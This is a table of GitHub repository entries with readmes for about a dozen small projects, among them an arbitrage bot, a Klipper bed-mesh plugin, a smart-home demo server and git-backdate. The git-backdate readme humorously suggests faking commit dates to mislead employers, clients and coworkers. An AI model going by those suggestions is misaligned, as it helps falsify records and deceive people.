| column | dtype | min | max |
| --- | --- | --- | --- |
| full_name | string (lengths) | 10 | 67 |
| url | string (lengths) | 29 | 86 |
| description | string (lengths) | 3 | 347 |
| readme | string (lengths) | 0 | 162k |
| stars | int64 | 10 | 3.1k |
| forks | int64 | 0 | 1.51k |
solidquant/whack-a-mole
https://github.com/solidquant/whack-a-mole
CEX-DEX arbitrage bot written in pure Python
# Whack-A-Mole <p align="center"> <img src = "https://github.com/solidquant/whack-a-mole/assets/134243834/841a91df-728b-489b-b4af-4af948c03c35" width="450px"> </p> The image is of Dugtrio from Pokemon. ### What the heck? Whack-A-Mole is a CEX-DEX arbitrage bot written in Python. Arbitrage strategies are like a global Whack-A-Mole game played in parallel. Multiple players participate to find the mole that pops up, and jump to capture that opportunity. Who knows who'll win... What we know for certain is that you'll need a fast pair of eyes on the market at all times, and an extra fast execution engine to capture the moment without latency. Will our beloved Python be able to accomplish this? We'll see 😎 ### Example Strategy #1: DEX arbitrage The **main** branch is likely to go through a lot of changes, so to run an example that works without breaking, you should switch to the **examples/strategy/dex_arb_base** branch before running **main.py**. Run: ``` git checkout examples/strategy/dex_arb_base ``` --- Check out my blog post describing in detail what this project attempts to do, and how you can use it. [Go to blog 👉](https://medium.com/@solidquant/how-i-built-my-first-mev-arbitrage-bot-introducing-whack-a-mole-66d91657152e) --- ⚡️ For readers who want to talk about MEV and other quant-related topics, please join my Discord! There’s currently no one on the Discord server, so it’s not too active yet, but I hope to meet new people there! 🌎🪐 https://discord.gg/jjTa8vkP
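The readme above describes watching CEX and DEX prices and executing quickly when a gap appears. As a rough illustration of that core check only (not code from the whack-a-mole repository), a minimal Python sketch might compare a CEX quote against a DEX quote after fees; the fee values, gas cost, and the `spread_after_fees` helper are hypothetical assumptions.

```python
# Minimal sketch of a CEX-DEX arbitrage check (hypothetical fees and helper,
# not code from the whack-a-mole repository).
CEX_FEE = 0.001   # assumed 0.1% taker fee
DEX_FEE = 0.003   # assumed 0.3% pool fee
GAS_COST_USD = 5  # assumed fixed gas cost per DEX trade


def spread_after_fees(cex_price: float, dex_price: float, size: float) -> float:
    """Profit (in quote currency) of buying on the DEX and selling on the CEX."""
    buy_cost = dex_price * size * (1 + DEX_FEE) + GAS_COST_USD
    sell_proceeds = cex_price * size * (1 - CEX_FEE)
    return sell_proceeds - buy_cost


if __name__ == "__main__":
    # Example quotes for a hypothetical ETH/USDC market.
    profit = spread_after_fees(cex_price=1852.0, dex_price=1845.0, size=1.0)
    if profit > 0:
        print(f"opportunity: +{profit:.2f} USDC")  # would trigger execution
    else:
        print("no edge after fees")
```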
12
5
ZhaiSoul/Steam-Liteloader
https://github.com/ZhaiSoul/Steam-Liteloader
A lightweight Steam UI mod loader
# Steam-Liteloader A lightweight Steam UI mod loader # How to use After cloning the project, extract it into the Steam\steamui directory and it is ready to use. # How to develop plugins To be determined; the basic framework is still being finished. # Future plans A plugin management tool and a plugin platform will be built in the future; security issues are currently being worked out. # How to contribute Join QQ group 857193118 and contact the group owner.
39
0
verytinydever/BlockchainApp-Solidity-SmartContracts
https://github.com/verytinydever/BlockchainApp-Solidity-SmartContracts
null
# Online-Shopping-System
10
0
long39ng/listviewerlite
https://github.com/long39ng/listviewerlite
View nested lists in R interactively using only HTML and CSS
<!-- README.md is generated from README.Rmd. Please edit that file --> # listviewerlite <!-- badges: start --> <!-- badges: end --> listviewerlite provides a single function `listview()`, which creates a collapsible tree view of R lists using only HTML and CSS, without the need for JavaScript. ## Installation You can install the development version of listviewerlite from [GitHub](https://github.com/) with: ``` r # install.packages("devtools") devtools::install_github("long39ng/listviewerlite") ``` ## Example ``` r library(listviewerlite) x <- list( list(id = "a", val = 2), list( id = "b", val = 1, children = list( list(id = "b1", val = 2.5), list( id = "b2", val = 8, children = list( list(id = "b21", val = 4) ) ) ) ), list( id = "c", val = 8, children = list( list(id = "c1"), list(id = "c2", val = 1) ) ) ) listview(x) ``` <img src="man/figures/preview.gif" width="480" /> ## Acknowledgements This package is inspired by [{listviewer}](https://github.com/timelyportfolio/listviewer), which wraps the JavaScript libraries [jsoneditor](https://github.com/josdejong/jsoneditor) and [react-json-view](https://github.com/mac-s-g/react-json-view). The implementation of the `listview()` function is inspired by `utils::str()` and `lobstr::tree()`. The custom CSS properties for the collapsible tree view are copied and modified from the [blog post by Kate Rose Morley](https://iamkate.com/code/tree-views/).
15
0
lifeisboringsoprogramming/sd-webui-xldemo-txt2img
https://github.com/lifeisboringsoprogramming/sd-webui-xldemo-txt2img
Stable Diffusion XL 0.9 Demo webui extension
# Stable Diffusion XL 0.9 txt2img webui extension <img src="images/webui.png"> A custom extension for [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) that demos the SDXL 0.9 txt2img features # Tested environment * GPU: RTX 3060 12G VRAM * OS: Ubuntu 20.04.4 LTS, Windows 10 * RAM: 64G * Automatic1111 WebUI version: v1.4.0 * python: 3.10.9 * torch: 2.0.1+cu118 * xformers: 0.0.20 * gradio: 3.32.0 * checkpoint: 20af92d769 # Overview * This project allows users to do txt2img using the SDXL 0.9 base checkpoint * Refine images using the SDXL 0.9 refiner checkpoint * Setting samplers * Setting sampling steps * Setting image width and height * Setting batch size * Setting CFG Scale * Setting seed * Reuse seed * Use refiner * Setting refiner strength * Send to img2img * Send to inpaint * Send to extras # Tutorial There is a video showing how to use the extension [![Introducing Stable Diffusion XL 0.9 txt2img AUTOMATIC1111 webui extension](https://img.youtube.com/vi/iF4w7gFDaYM/sddefault.jpg)](https://www.youtube.com/watch?v=iF4w7gFDaYM) # Stable Diffusion extension This project can be run as a Stable Diffusion extension inside the Stable Diffusion WebUI. ## Installation as a Stable Diffusion extension * Copy and paste `https://github.com/lifeisboringsoprogramming/sd-webui-xldemo-txt2img.git` into the URL for extension's git repository field * Press the Install button * Apply and restart the UI when finished installing <img src="images/webui-install.png" /> # Samplers mapping |Sampler name|Diffusers schedulers class| |---|---| |dpmsolver_multistep|diffusers.schedulers.scheduling_dpmsolver_multistep.DPMSolverMultistepScheduler| |deis_multistep|diffusers.schedulers.scheduling_deis_multistep.DEISMultistepScheduler| |unipc_multistep|diffusers.schedulers.scheduling_unipc_multistep.UniPCMultistepScheduler| |k_dpm_2_ancestral_discrete|diffusers.schedulers.scheduling_k_dpm_2_ancestral_discrete.KDPM2AncestralDiscreteScheduler| |ddim|diffusers.schedulers.scheduling_ddim.DDIMScheduler| |dpmsolver_singlestep|diffusers.schedulers.scheduling_dpmsolver_singlestep.DPMSolverSinglestepScheduler| |euler_ancestral_discrete|diffusers.schedulers.scheduling_euler_ancestral_discrete.EulerAncestralDiscreteScheduler| |ddpm|diffusers.schedulers.scheduling_ddpm.DDPMScheduler| |euler_discrete|diffusers.schedulers.scheduling_euler_discrete.EulerDiscreteScheduler| |k_dpm_2_discrete|diffusers.schedulers.scheduling_k_dpm_2_discrete.KDPM2DiscreteScheduler| |pndm|diffusers.schedulers.scheduling_pndm.PNDMScheduler| |dpmsolver_sde|diffusers.schedulers.scheduling_dpmsolver_sde.DPMSolverSDEScheduler| |lms_discrete|diffusers.schedulers.scheduling_lms_discrete.LMSDiscreteScheduler| |heun_discrete|diffusers.schedulers.scheduling_heun_discrete.HeunDiscreteScheduler| # Limitations * This extension does not work with other extensions like ControlNet * This extension does not work with LoRA, textual inversion embeddings, etc. # YouTube Channel Please subscribe to my YouTube channel, thank you very much. [https://bit.ly/3odzTKX](https://bit.ly/3odzTKX) # Patreon ☕️ Please consider supporting me on Patreon 🍻 [https://www.patreon.com/lifeisboringsoprogramming](https://www.patreon.com/lifeisboringsoprogramming)
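The samplers mapping table above pairs webui-style sampler names with diffusers scheduler classes. As a minimal sketch of how such a mapping can be applied outside the extension (this is not the extension's own code), the snippet below swaps schedulers on a diffusers SDXL pipeline; access to the gated `stabilityai/stable-diffusion-xl-base-0.9` checkpoint and a CUDA GPU are assumptions.

```python
# Sketch of applying a sampler-name -> scheduler-class mapping to a diffusers
# pipeline (not the extension's own code; model access and GPU are assumed).
import torch
from diffusers import (
    StableDiffusionXLPipeline,
    DPMSolverMultistepScheduler,
    EulerAncestralDiscreteScheduler,
    DDIMScheduler,
)

SAMPLERS = {
    "dpmsolver_multistep": DPMSolverMultistepScheduler,
    "euler_ancestral_discrete": EulerAncestralDiscreteScheduler,
    "ddim": DDIMScheduler,
}

pipe = StableDiffusionXLPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-0.9", torch_dtype=torch.float16
).to("cuda")

# Swap the scheduler while reusing the pipeline's existing scheduler config.
pipe.scheduler = SAMPLERS["euler_ancestral_discrete"].from_config(pipe.scheduler.config)

image = pipe("a photo of an astronaut riding a horse", num_inference_steps=30).images[0]
image.save("sdxl_txt2img.png")
```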
187
23
GineTik/Telegramper-TelegramFramework
https://github.com/GineTik/Telegramper-TelegramFramework
Telegramper is the Telegram.Framework, which is similar to ASP.Net Core. It contains services, middleware, configuration, controllers (executors), and more.
# Telegramper It is a framework similar to ASP.NET Core. The framework contains services, middleware, configuration, controllers (executors), and more. > The framework is under development, so unexpected errors and changes in functionality and names are possible! I would be grateful if you could report any bugs or functionality you need. ## Learn more about the framework 1. [About UpdateContext (similar to HttpContext)](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/TelegramBotApplication/Context) 1. [Configuring the bot in Program.cs (Services, Middlewares, etc.)](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/TelegramBotApplication) 1. [Executors and attributes](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/Executors) 1. [Session](https://github.com/GineTik/Telegramper-TelegramFramework/tree/master/Telegramper/Sessions) ### Chapters coming soon - Dialog - Examples of projects written with the Telegramper framework ## Quick start ```cs internal class Program { static void Main(string[] args) { var builder = new BotApplicationBuilder(); builder.ConfigureApiKey("your api key"); builder.ReceiverOptions.ConfigureAllowedUpdates(UpdateType.Message, UpdateType.CallbackQuery); // default is UpdateType.Message builder.Services.AddExecutors(); // identical to the controller in ASP.Net Core var app = builder.Build(); app.UseExecutors(); app.RunPolling(); // webhooks are not implemented, but in the future you will be able to, for example, change polling to webhooks and vice versa } } public class BasicExecutor : Executor { [TargetCommands] // identical to [TargetCommands("start")] public async Task Start() { var sender = UpdateContext.User.ToString(); await Client.SendTextMessageAsync($"You are {sender}"); // send a text response } [TargetCommands("echo, command2")] [EmptyParameterSeparator] // remove the separator; by default it is a space (" ") public async Task Echo(string phrase) // more about the parameters later { await Client.SendTextMessageAsync(phrase); } } ```
17
1
blackav/smart-home-binary
https://github.com/blackav/smart-home-binary
Smart-home problem demo server binary releases
# smart-home-binary Demo server for the "smart home" problem ## Running Before running on Linux or MacOS, make sure the file has execute permissions. You can set them with the command: ``` chmod +x FILE ``` Always use the latest version of the demo server. To see the list of available program options, use the `--help` option. ## Running in server mode The `-s` option starts the program in server mode: ``` ./smarthome -s ``` If you are working on Windows, do not put `./` before the command. Run the command from a command shell, for example `cmd.exe`. ``` smarthome.exe -s ``` Note that the name of the downloaded file contains the operating system, processor, and program version. Either rename the downloaded file or adjust the command line accordingly. In server mode the following additional options can be specified: * `-p PORT` - the port number on which the server will wait for connections. Port 9998 is used by default. * `-0 TIME` - the initial model time for the simulation in the format `YYYY-MM-DDThh:mm:ss`, for example `1984-04-01T13:00:00`. The default is the current astronomical time rounded to seconds. * `-1 DUR` - the duration of the simulation, 1 hour by default. * `-S SCENARIO` - run the scenario with the given number. The scenarios are described below. * `-V` - print received and sent packets in JSON format. If the launch was successful, the demo server will wait for connections on the specified port. You can check this, for example, with `curl` ``` curl -H POST -d "" localhost:9998 ``` In response you should receive a base64-encoded string containing a message with the initial model time. The server's response may look something like this: ``` DbMG_38BBgaI0Kv6kzGK ``` ## Scenarios Version 0.2.0 supports two operating scenarios. ### Scenario 1 In this scenario the network contains a single device - a timer named `TIMER01`. The timer sends messages with the current time every 100 ms of model time. ### Scenario 2 In this scenario the network contains the timer `TIMER01`, the lamp `LAMP02`, and the switch `SWITCH03`, which is wired to the lamp. The switch is initially in the "off" state and periodically changes its state. The timer sends messages with the current time every 100 ms of model time. ## Encoding and decoding packets The demo server can also be used as a utility for encoding and decoding packets. Note that the JSON format is used for debugging purposes only. Packets are transmitted over the network in binary form, encoded in Base64. The `-B` option decodes a packet from base64 into JSON form. For example, if you run the following command from a Unix command line ``` echo DbMG_38BBgaI0Kv6kzGK | ./smarthome -B ``` the following will be printed to standard output ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` The `-J` option converts the JSON representation into the base64 representation for sending. For example, if you run the command ``` ./smarthome -J ``` and enter the following on standard input ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` the following will be printed to standard output ``` DbMG_38BBgaI0Kv6kzGK ``` The `-K` option converts the JSON representation into the binary representation.
This lets you see how a packet is represented in binary form before it is encoded in Base64. For example, if you run the command ``` ./smarthome -K | hexdump -C ``` and enter the following on standard input ``` [ { "length": 13, "payload": { "src": 819, "dst": 16383, "serial": 1, "dev_type": 6, "cmd": 6, "cmd_body": { "timestamp": 1688984021000 } }, "crc8": 138 } ] ``` the following will be printed to standard output ``` 00000000 0d b3 06 ff 7f 01 06 06 88 d0 ab fa 93 31 8a |.............1.| ``` Note! The commands assume that you are using Linux or MacOS. On Windows the corresponding commands may differ. ## Packet examples Below are example packets in base64 for every possible pair of device type and command. * SmartHub, WHOISHERE (1, 1): `DAH_fwEBAQVIVUIwMeE` * SmartHub, IAMHERE (1, 2): `DAH_fwIBAgVIVUIwMak` * EnvSensor, WHOISHERE (2, 1): `OAL_fwMCAQhTRU5TT1IwMQ8EDGQGT1RIRVIxD7AJBk9USEVSMgCsjQYGT1RIRVIzCAAGT1RIRVI03Q` * EnvSensor, IAMHERE (2, 2): `OAL_fwQCAghTRU5TT1IwMQ8EDGQGT1RIRVIxD7AJBk9USEVSMgCsjQYGT1RIRVIzCAAGT1RIRVI09w` * EnvSensor, GETSTATUS (2, 3): `BQECBQIDew` * EnvSensor, STATUS (2, 4): `EQIBBgIEBKUB4AfUjgaMjfILrw` * Switch, WHOISHERE (3, 1): `IgP_fwcDAQhTV0lUQ0gwMQMFREVWMDEFREVWMDIFREVWMDO1` * Switch, IAMHERE (3, 2): `IgP_fwgDAghTV0lUQ0gwMQMFREVWMDEFREVWMDIFREVWMDMo` * Switch, GETSTATUS (3, 3): `BQEDCQMDoA` * Switch, STATUS (3, 4): `BgMBCgMEAac` * Lamp, WHOISHERE (4, 1): `DQT_fwsEAQZMQU1QMDG8` * Lamp, IAMHERE (4, 2): `DQT_fwwEAgZMQU1QMDGU` * Lamp, GETSTATUS (4, 3): `BQEEDQQDqw` * Lamp, STATUS (4, 4): `BgQBDgQEAaw` * Lamp, SETSTATUS (4, 5): `BgEEDwQFAeE` * Socket, WHOISHERE (5, 1): `DwX_fxAFAQhTT0NLRVQwMQ4` * Socket, IAMHERE (5, 2): `DwX_fxEFAghTT0NLRVQwMc0` * Socket, GETSTATUS (5, 3): `BQEFEgUD5A` * Socket, STATUS (5, 4): `BgUBEwUEAQ8` * Socket, SETSTATUS (5, 5): `BgEFFAUFAQc` * Clock, IAMHERE (6, 2): `Dgb_fxUGAgdDTE9DSzAxsw` * Clock, TICK (6, 6): `DAb_fxgGBpabldu2NNM`
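The readme above shows that packets are exchanged as URL-safe base64 over HTTP and can be inspected with the `-B`, `-J`, and `-K` options. Below is a minimal Python sketch that reproduces the decoding step for the documented example packet; the ULEB128 varint field layout is inferred from the JSON that `-B` prints and is an assumption, not something the readme states.

```python
# Decode the documented example packet DbMG_38BBgaI0Kv6kzGK (15 bytes).
# The varint (ULEB128) field layout is inferred from the JSON shown by
# `./smarthome -B` and may not cover every device type or command.
import base64


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def read_uleb128(data: bytes, pos: int) -> tuple[int, int]:
    value, shift = 0, 0
    while True:
        byte = data[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if byte & 0x80 == 0:
            return value, pos
        shift += 7


raw = b64url_decode("DbMG_38BBgaI0Kv6kzGK")
print(raw.hex(" "))                    # 0d b3 06 ff 7f 01 06 06 88 d0 ab fa 93 31 8a

length = raw[0]                        # 13
payload, crc8 = raw[1:1 + length], raw[1 + length]
pos = 0
src, pos = read_uleb128(payload, pos)             # 819
dst, pos = read_uleb128(payload, pos)             # 16383
serial, pos = read_uleb128(payload, pos)          # 1
dev_type, cmd = payload[pos], payload[pos + 1]    # 6, 6 (Clock, TICK)
timestamp, _ = read_uleb128(payload, pos + 2)     # 1688984021000
print(src, dst, serial, dev_type, cmd, timestamp, hex(crc8))
```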
40
9
DevMiser/Bird-Sweeper
https://github.com/DevMiser/Bird-Sweeper
The Bird Sweeper chases birds away but does not hurt them. It is an effective and humane bird deterrent.
# The Bird-Sweeper <img width="461" alt="B1" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/0fca9c41-a781-43c1-8dc8-e48aa376c733"> <img width="435" alt="B2" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/3d88019a-1909-44f9-a8c5-d4fc0e12d587"> <img width="474" alt="B3" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/d7889414-86d7-4b46-9d6d-e91df5bd40c8"> <img width="473" alt="B4" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/2ee469ef-5b20-4b62-8d9f-f6aa6f92c063">
15
1
xinsblog/chatglm-tiny
https://github.com/xinsblog/chatglm-tiny
Train a small ChatGLM model from scratch
* [chatglm-tiny: train a small ChatGLM model from scratch](https://zhuanlan.zhihu.com/p/642355086)
14
0
eamars/klipper_adaptive_bed_mesh
https://github.com/eamars/klipper_adaptive_bed_mesh
A Python plugin that generates the bed mesh based on the printed part.
Klipper Adaptive Bed Mesh === [中文版](readme_zh_cn.md) # What is it? The *Adaptive Bed Mesh* plugin is designed to dynamically generate the bed mesh parameters based on the sliced part. With finer bed mesh density around the printed parts you can achieve better accuracy and spend less time probing. ![bed_mesh_path](resources/bed_mesh_path.png) The *Adaptive Bed Mesh* plugin is inspired by multiple open-source projects - [Klipper mesh on print area only install guide](https://gist.github.com/ChipCE/95fdbd3c2f3a064397f9610f915f7d02) - [Klipper Adaptive meshing & Purging](https://github.com/kyleisah/Klipper-Adaptive-Meshing-Purging) ## Features The *Adaptive Bed Mesh* plugin supports 3 operating modes. By default, the list below is also the order of precedence. 1. First layer min/max provided by the slicer. 2. Object shape detection by Klipper Exclude Object. 3. Object shape detection by GCode analysis. If all of the above modes fail, then the *Adaptive Bed Mesh* falls back to the default full bed mesh configuration. ### First layer min/max provided by the slicer Most slicers can export the min (closest to 0,0) and max coordinates of the first layer extrude motions. Below is the syntax for a few popular slicers. #### Orca Slicer / Super Slicer / Prusa Slicer ADAPTIVE_BED_MESH_CALIBRATE AREA_START={first_layer_print_min[0]},{first_layer_print_min[1]} AREA_END={first_layer_print_max[0]},{first_layer_print_max[1]} #### Cura ADAPTIVE_BED_MESH_CALIBRATE AREA_START=%MINX%,%MINY% AREA_END=%MAXX%,%MAXY% Copied from [Klipper mesh on print area only install guide](https://gist.github.com/ChipCE/95fdbd3c2f3a064397f9610f915f7d02) > *(Cura slicer plugin) To make the macro work in the Cura slicer, you need to install the [post process plugin by frankbags](https://raw.githubusercontent.com/ChipCE/Slicer-profile/master/cura-slicer/scripts/KlipperPrintArea.py) > - In the Cura menu Help -> Show configuration folder. > - Copy the python script from the above link into the scripts folder. > - Restart Cura > - In the Cura menu Extensions -> Post processing -> Modify G-Code and select Klipper print area mesh ### Object shape detection by Klipper Exclude Object The [Klipper Exclude Object](https://www.klipper3d.org/Exclude_Object.html) feature collects the printed part boundaries for its object-exclude functionality. Depending on the slicer, the printed part boundary can be a simple bounding box or a more complicated hull of the object geometry. There is no special parameter to activate the object-shape-based bed mesh. If the Exclude Object feature is [enabled in Klipper](https://www.klipper3d.org/Config_Reference.html#exclude_object) and your slicer supports it, then the bed mesh area will be calculated based on all registered boundaries. ### Object shape detection by GCode analysis As the last line of defense, when all of the above detection algorithms fail (or are disabled), the object boundaries are determined by GCode analysis. The GCode analysis evaluates all extrude moves (G0, G1, G2, G3) and creates the object boundary layer by layer. It evaluates all layers unless [mesh fade](https://www.klipper3d.org/Bed_Mesh.html#mesh-fade) is configured. For example, with the below `[bed_mesh]` section, the GCode analysis will stop at 10mm above the bed, the same height at which Klipper stops the bed mesh compensation. [bed_mesh] ... fade_start: 1 fade_end: 10 fade_target: 0 # Configurations ## [bed_mesh] The *Adaptive Bed Mesh* will use values from the `[bed_mesh]` section. Below are the required attributes.
Please make sure the min/max coordinates are within the safe probing boundaries. [bed_mesh] # The mesh start coordinate. The adaptive bed mesh will not generate points smaller than this coordinate. mesh_min: 20, 20 # The maximum coordinate of the bed mesh. The adaptive bed mesh will not generate points greater than this coordinate. # Note: This is not necessarily the last point of the probing sequence. mesh_max: 230,230 # (Optional) The Z height at which fade should complete fade_end: 10 > **_NOTE:_** The `relative_reference_index` is now [deprecated](https://www.klipper3d.org/Bed_Mesh.html#the-deprecated-relative_reference_index). > **_NOTE:_** The `zero_reference_position` will be overwritten by the plugin, so you don't need to configure it in the `[bed_mesh]` > section. ## [virtual_sdcard] The *Adaptive Bed Mesh* will use values from the `[virtual_sdcard]` section. Below are the required attributes. Usually `[virtual_sdcard]` is defined by the Mainsail or Fluidd configuration. [virtual_sdcard] path: ~/printer_data/gcodes ## [adaptive_bed_mesh] The `[adaptive_bed_mesh]` section needs to be declared in `printer.cfg`, after `[exclude_object]` and `[virtual_sdcard]`. [adaptive_bed_mesh] arc_segments: 80 # (Optional) The number of segments for G2/3 to be decoded into linear motions. mesh_area_clearance: 5 # (Optional) Expand the mesh area outside of the printed area in mm. max_probe_horizontal_distance: 50 # (Optional) Maximum distance between two horizontal probe points in mm. max_probe_vertical_distance: 50 # (Optional) Maximum distance between two vertical probe points in mm. use_relative_reference_index: False # (Optional) For older Klipper (< 0.11.2xx), `use_relative_reference_index` is used to determine the center point. This is not required for newer releases. # (Optional) Enable/Disable detection algorithms on demand disable_slicer_min_max_boundary_detection: False disable_exclude_object_boundary_detection: False disable_gcode_analysis_boundary_detection: False ## How to determine the maximum horizontal/vertical probe distances The *Adaptive Bed Mesh* uses the probe distance, instead of the number of points to be probed, to achieve more consistent probe density across parts of different sizes. To calculate the optimal probe distance, you can use the reference number of points for a full printed bed as an example. For a 250mm by 250mm square heated bed, a 5x5 mesh is generally sufficient. The maximum horizontal and vertical probe distance can then be calculated as probe_distance = 250 / 5 = 50mm # Usage Calling `ADAPTIVE_BED_MESH_CALIBRATE` as part of the `PRINT_START` macro is all you need. Example: [gcode_macro PRINT_START] gcode: ... ADAPTIVE_BED_MESH_CALIBRATE ... > **_NOTE:_** If you're using the [Automatic Z-Calibration plugin](https://github.com/protoloft/klipper_z_calibration) > then you need to ensure that `ADAPTIVE_BED_MESH_CALIBRATE` is called prior to `CALIBRATE_Z`. # Install via Moonraker Clone the repository to the home directory cd ~ git clone https://github.com/eamars/klipper_adaptive_bed_mesh.git You need to manually install the plugin for the first time. It will prompt for a password to restart the Klipper process. source klipper_adaptive_bed_mesh/install.sh Then copy the block below into moonraker.conf to allow automatic updates. [update_manager client klipper_adaptive_bed_mesh] type: git_repo primary_branch: main path: ~/klipper_adaptive_bed_mesh origin: https://github.com/eamars/klipper_adaptive_bed_mesh.git install_script: install.sh # Contribution Contributions are welcome.
However, before opening a new pull request, please make sure the feature passes the unit tests in `test_adaptive_bed_mesh.py`, and add new tests if necessary.
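As a worked illustration of the probe-distance rule and the `mesh_area_clearance` option described above (a sketch only, not the plugin's actual implementation), the following computes an adaptive mesh area and probe counts from first-layer bounds using the sample configuration values:

```python
# Sketch of deriving an adaptive mesh area and probe counts from the
# first-layer bounds, mirroring the sample configuration above (not the
# plugin's actual code).
import math


def adaptive_mesh(first_layer_min, first_layer_max,
                  mesh_min=(20, 20), mesh_max=(230, 230),
                  clearance=5, max_probe_distance=50):
    # Expand the printed area by the clearance, then clamp to the safe mesh bounds.
    x0 = max(mesh_min[0], first_layer_min[0] - clearance)
    y0 = max(mesh_min[1], first_layer_min[1] - clearance)
    x1 = min(mesh_max[0], first_layer_max[0] + clearance)
    y1 = min(mesh_max[1], first_layer_max[1] + clearance)
    # Enough points that no two probes are farther apart than max_probe_distance;
    # a minimum of 3 points per axis is assumed here.
    nx = max(3, math.ceil((x1 - x0) / max_probe_distance) + 1)
    ny = max(3, math.ceil((y1 - y0) / max_probe_distance) + 1)
    return (x0, y0), (x1, y1), (nx, ny)


print(adaptive_mesh((90, 90), (160, 160)))
# ((85, 85), (165, 165), (3, 3)) -> a 3x3 mesh over the printed part only
```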
13
1
dekdevy/idm
https://github.com/dekdevy/idm
Tag images, batch resize, export, string interpolated descriptions + common image dataset utilities
## Image Dataset Manager #### Current state: Early Testing This tool allows you to conveniently load many images, tag them with information, batch export, do image operations, cropping, etc. This can be useful for machine learning or gamedev. ![Screenshot](https://github.com/dekdevy/idm/blob/main/screenshot.png?raw=true) ## Current Features - Tagging of single and multiple images at the same time - Tag groups with custom join strings, pre- and suffix strings - Image descriptions based on custom tag interpolation (`"Photo of a {type} with {color} {feature}"`) - Exporting with batch resize and cropping, image descriptions into `".txt"` - Filtering of images based on tags, filenames, group tag counts - Flattening of alpha channels, replacing alpha with color ## Planned Features - Auto toggle of tags based on file paths - Export path string interpolation (exporting to `/{type}/0.png` etc) ## Development Requires Node and Rust, made with [Tauri](https://tauri.app/). ``` npm install npm run tauri dev ```
15
1
rixx/git-backdate
https://github.com/rixx/git-backdate
Backdate a commit or range of commits to a date or range of dates.
> Who controls the past, controls the future: who controls the present, controls the past. The mutability of the past > is the central tenet of Ingsoc. Past events, it is argued, have no existence, but survive only in written records and > in human memories. The past is whatever the records and the memories agree upon. And since ~~the Party~~ git is in > full control of all records and in equally full control of the minds of its members, it follows that the past is > whatever ~~the Party~~ git chooses to make it. *– Linus Torvalds, probably* # git-backdate git-backdate helps you to change the date of one or multiple commits to a new date or a range of dates. ## Features - Understands business hours, and that you might want to have your commits placed inside or outside of them. - Commits are randomly distributed within the given time window, while retaining their order. No 12:34:56 for you anymore! - Given a single commit, git-backdate will automatically assume that you want to rebase the entire range from there to your current `HEAD`. - Sets author date and committer date so you don't have to look up how to set both of them every time you fudge a commit timestamp. - Python, but with near-zero dependencies (see below; only `sed` and `date`), so you can just download and run it without Python package management making you sad. ## Usage Backdate all your unpushed commits to the last three days, and only during business hours: ```shell git backdate origin/main "3 days ago..today" --business-hours ``` Backdate only some commits to have happened outside of business hours: ```shell git backdate 11abe2..3d13f 2023-07-10 --no-business-hours ``` Backdate only the current commit to a human readable time: ```shell git backdate HEAD "5 hours ago" ``` ## Installation Drop the `git-backdate` file somewhere in your `PATH` or wherever you like: ```shell curl https://raw.githubusercontent.com/rixx/git-backdate/main/git-backdate > git-backdate chmod +x git-backdate ``` The magic of git will now let you use `git backdate` as a command. ### Requirements `git-backdate` tries to only require git and Python. However, it also relies on - `sed` if you want to backdate more than the most recent commit <sup>for perfectly fine reasons, don't worry about it</sup> - `date` if you want to pass date descriptions like "last Friday" or "2 weeks ago" ## … why. I started various versions of this in uni, when I did my assignments last minute and wanted to appear as if I had my life together. I still sometimes use it like that (especially to make the 3am commits look less deranged), but there have been new and surprising use cases. Most of these have been contributed by friends and do not reflect on me, nor do they represent legal or career advice: - Did work things outside work hours, but don't want to nudge your workplace culture into everybody working at all times. - Worked an entire weekend for a client, but don't want them to get used to it and start calling you on every weekend. - Made some fixes during a boring meeting, but pretended to pay attention throughout. - Want to confuse your coworkers by making it look like you were committing code while doing a company-wide presentation. - <your reason here, please share with the class> ## Caveats Commit dates are part of a commit's metadata. Changing a commit's date changes its hash. You very likely only want to run `git backdate` on commits that you have not pushed yet, because otherwise you would have to `--force` push your new history. 
I know, I know, you're using `--force-with-lease`, so you won't destroy data, but your collaborators or integrations will still be somewhat miffed. Also, obviously, use with care and compassion.
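The readme above says commits are randomly distributed within the chosen window while retaining their order. A minimal Python sketch of that idea (not the actual git-backdate implementation, which also handles business hours and drives the rebase itself):

```python
# Sketch of spreading N commit timestamps randomly across a window while
# preserving commit order (not the actual git-backdate implementation).
import random
from datetime import datetime, timedelta


def backdates(n_commits: int, start: datetime, end: datetime) -> list[datetime]:
    window = (end - start).total_seconds()
    offsets = sorted(random.uniform(0, window) for _ in range(n_commits))
    return [start + timedelta(seconds=off) for off in offsets]


dates = backdates(5, datetime(2023, 7, 10, 9, 0), datetime(2023, 7, 10, 17, 0))
for d in dates:
    # Each date would then be applied as both the author date and the
    # committer date, e.g. via GIT_AUTHOR_DATE / GIT_COMMITTER_DATE.
    print(d.isoformat())
```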
194
7
appwrite/dynamic-links
https://github.com/appwrite/dynamic-links
Implement Dynamic Links with Appwrite Functions!
